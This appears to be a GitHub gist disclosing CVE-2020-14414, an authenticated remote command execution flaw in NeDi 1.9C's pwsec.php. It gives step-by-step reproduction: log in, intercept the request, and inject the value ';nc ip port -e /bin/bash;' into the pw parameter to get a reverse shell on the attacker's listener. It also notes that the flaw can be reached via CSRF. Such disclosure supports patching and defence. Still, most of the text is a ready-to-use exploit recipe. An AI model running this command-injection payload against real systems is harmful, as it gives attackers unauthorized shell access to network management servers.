Skip to content

Instantly share code, notes, and snippets.

@farid007
Created June 28, 2020 18:32
Show Gist options
  • Save farid007/a3d96d305f028d221f729eb6ae681f5a to your computer and use it in GitHub Desktop.
Save farid007/a3d96d305f028d221f729eb6ae681f5a to your computer and use it in GitHub Desktop.
NeDi 1.9C Authenticated RCE (CVE-2020-14414)
CVE-2020-14414
NeDi 1.9C is vulnerable to Remote Command Execution. pwsec.php improperly escapes shell metacharacters from a POST request. An attacker can exploit this by crafting an arbitrary payload (any system commands) that contains shell metacharacters via a POST request with a pw parameter. (This can also be exploited via CSRF.)
Steps To Reproduce-:
>
> Login with the credential.
> Go to https://ip/pwsec.php.
> Insert any data in the first field then intercept the request.
> Insert this command (';nc ip port -e /bin/bash;') and start listener on port (Note we need to use ' (single quote)).
> You will be greeted with a shell.
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment